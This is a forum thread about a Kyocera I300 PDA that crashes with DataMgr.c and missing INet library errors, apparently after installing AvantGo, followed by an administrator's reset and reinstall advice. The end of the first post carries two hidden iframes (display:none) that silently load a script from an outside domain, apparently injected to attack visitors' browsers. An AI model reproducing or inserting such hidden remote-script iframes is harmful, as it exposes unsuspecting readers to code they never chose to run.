+ Reply to Thread
Results 1 to 2 of 2
  1. #1
    Registered User
    Join Date
    11-20-2001
    Posts
    4

    Angry AvantGo causes BAD crash?

    Hi Everybody,

    So, I've had my I300 for about a week and a half. It's easily the coolest gadget I've ever had, but I've run into a nasty crash twice now, and I think it might be caused by AvantGo. The evidence is circumstantial at best, but both times this has happened were within 24 hours of installing AvantGo.

    Basically, what happened both times was that a Fatal Exception message would come up when I tried to use a program that needed internet access. After resetting, the device immediately shows the following error:

    Fatal Alert: DataMgr.c: Line 8589, Index out of range.

    I can get the device to boot by using the resetting while holding the up arrow (does anyone know what this does?), but now no internet applications work! Argh! For example, Aileron reports:

    INet:Lib not found- err = 1290.

    The real kicker is that a hard reset and restore via hotsync doesn't fix the problem. Immediately after I sync, the I300 tells me that I need to restart, and crashes right after it boots. The only way I fixed this last time was to delete the profile on my computer, reset the PDA, and re-install all software from scratch. Ouch! I've got a lot more software today than two weeks ago.

    I'm sorry that this ended up being such a long message. I was just hoping that somebody would have some suggestions that would save me from having to reload everything. If the tcp/ip libraries are missing/corrupted, is there a way to restore them? Does that explain the error in DataMgr.c?

    Many thanks for any help or suggestions!
    Chris<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048

    Arrow

    the reset-up arrow thingy is a warm reset. it goes a stepp further than a simple reset

    if you do a cold reset and then resync the old stuff back on the phone, you will encounter the same error...


    avantgo might be a culprit.. try to not use it for a while and see.. if you have other 3rd party apps on the phone, they might be causing problems also...

    you only SURE way is to brainwash the phone, then install one app at a time.. that way you will know what the cukprit(s) is/are.

    also, make sure you are using palm 4.0.1...

    hope i shedded a little light...

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts